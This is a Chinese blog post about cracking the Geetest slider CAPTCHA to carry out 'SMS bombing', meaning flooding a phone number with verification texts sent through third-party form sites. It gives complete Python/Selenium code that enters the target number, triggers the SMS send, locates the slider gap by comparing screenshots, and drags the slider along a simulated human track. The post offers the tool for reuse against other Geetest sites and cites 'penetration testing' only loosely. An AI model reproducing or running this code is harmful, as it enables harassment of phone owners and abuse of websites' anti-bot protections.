目录导航
极验验证码破解 实现短信轰炸
极验验证码破解 先上代码 黑客书籍
#! python3 # coding:utf-8 import time,random from PIL import Image from selenium import webdriver from selenium.webdriver.common.action_chains import ActionChains import logging logging.basicConfig(level=logging.DEBUG, format='%(asctime)s - %(levelname)s -%(message)s') phoneNum = '13456788765' # initial offset initial_offset = 10 URLs = ['https://biaodan.info/q/7sisis'] #TODO get html elements def sendPhone(driver, phoneNum, phoneInputClass, sendPhoneButtonId): # driver = webdriver.Chrome() logging.debug('Send Phone Start') phoneInput = driver.find_element_by_class_name(phoneInputClass) phoneInput.send_keys(phoneNum) time.sleep(2) sendBtn = driver.find_element_by_id(sendPhoneButtonId) sendBtn.click() time.sleep(5) #TODO compare Captcha & return tarck def elementsScreenshot(driver, bgImgClass, dragBallClass): # driver = webdriver.Chrome() logging.debug('start make background screenshot') driver.find_element_by_class_name(bgImgClass).screenshot('bg_full.png') time.sleep(2) ball = driver.find_element_by_class_name(dragBallClass) ActionChains(driver).click_and_hold(ball).perform() ActionChains(driver).move_by_offset(190, 0).perform() # move the ball to right # this is important time.sleep(0.5) driver.find_element_by_class_name(bgImgClass).screenshot('cut.png') # move the ball to left ActionChains(driver).move_by_offset(-30, 0).perform() time.sleep(1) ActionChains(driver).move_by_offset(-50, 0).perform() time.sleep(1) ActionChains(driver).move_by_offset(-40, 0).perform() time.sleep(1) ActionChains(driver).move_by_offset(-30, 0).perform() time.sleep(1) ActionChains(driver).move_by_offset(-40, 0).perform() def dragBall(driver, track, dragBallClass): ball = driver.find_element_by_class_name(dragBallClass) logging.debug('ball start move') # simulate human's behave while track: len = random.choice(track) ActionChains(driver).move_by_offset(len, 0).perform() track.remove(len) logging.debug(track) time.sleep(len/10) imitate2L = ActionChains(driver).move_by_offset(-2, 0) imitateL = ActionChains(driver).move_by_offset(-1, 0) time.sleep(0.015) imitate2L.perform() time.sleep(0.04) imitateL.perform() time.sleep(0.04) imitate2L.perform() time.sleep(0.04) imitateL.perform() time.sleep(0.04) imitate2L.perform() ActionChains(driver).pause(random.randint(6, 10) / 10).release(ball).perform() def getTrack(distance): logging.debug('calcute distance track') # simulate human's hebace s = 1 / 2 a t t track =[] current = 0 mid = distance * 3 / 4 t = random.randint(2, 3) / 10 v = 0 logging.debug('1') while current < distance: if current < mid: a = 2 else: a = -3 v0 = v v = v0 + a * t move = v0 * t + 1 / 2 * a * t * t current += move track.append(round(move)) logging.debug(track) return track # TODO compare two img def compareImg(img1, img2, x, y): logging.debug('compare img start') pix1 = img1.load()[x, y] pix2 = img2.load()[x, y] threshold = 60 if (abs(pix1[0] - pix2[0] < threshold) and abs(pix1[1] - pix2[1] < threshold) and abs(pix1[2] - pix2[2] < threshold)): return True else: return False def getOffset(bgFullPath, bgPath): logging.debug('get img offset') bg_full = Image.open(bgFullPath) bg = Image.open(bgPath) left = initial_offset for width in range(left, bg_full.size[0]): for height in range(bg_full.size[1]): if not compareImg(bg_full, bg, width, height): left = width return left return left #TODO execute Crack it def main(driver): logging.debug('main() start') for url in URLs: driver.get(url) logging.debug('%s get html', url) time.sleep(3) sendPhone(driver, phoneNum, 'filter-input', 'btnSendCode') elementsScreenshot(driver, 'gt_cut_fullbg', 'gt_slider_knob') distance = getOffset('bg_full.png', 'cut.png') # logging.debug('%s',distance) track = getTrack(distance) dragBall(driver, track, 'gt_slider_knob') time.sleep(3) if __name__ == '__main__': driver = webdriver.Chrome() for i in range(1, 2): logging.debug('%s Test', i) try: main(driver) except: print("%d Error", i) pass driver.close() driver.quit()
在部分进行安全渗透测试的场景下,需要对手机号进行短信轰炸操作,无奈不想在这方面增加投入,无意中看到了表单大师的部分网站提供短信验证码服务,但是每次需要进行验证,于是便有了本篇交流。
某个主页(无恶意,搜索引擎得到)
随意输入的号码,然后点击发送,出现验证码
要实现网站群发的话要具备以下几个条件
1、一定数量的发送验证码服务的网站(每个页面有一个时间限制,限制120s后再次发送,但是根据后期实践效果,不需要等待120s,但是间隔一段时间可以提高验证码的成功率)
2、webdriver+selenium实现爬虫,自动化操作
3、就是实现代码了,在github上有其他人的实现代码,但是在表单大师上表现效果不佳,所以便有了以下实现
开始实现了
首先引入库,部分变量申明
找到电话号码输入框,模拟输入电话号码
代码实现
验证码图片元素(采用区域截图方式,快速,方便,而且很准确,极验的这张图片,是无法通过元素审查直接得到下载地址,是一片一片拼成的)
代码实现
然后获取要操作的元素(就是拉动的那个球)
代码实现
在后面就是在验证码活动的过程中的轨迹计算,首先通过比较图片元素的不同,获得要到达的地点(这就是之前截图时将滑块移到最右边,确保第一次计算出来的不同就是要移动的终点,移动轨迹的算法参考了网上的实现,简单来讲就是s=v0t+1/2at^2)
到这里,基本就已经结束了,接下来就是主程序了
其实这也可以用于采用了极验的其他场合,大家自己修改
代码上传github,欢迎大家fork,star
https://github.com/xtom598/geeTestCode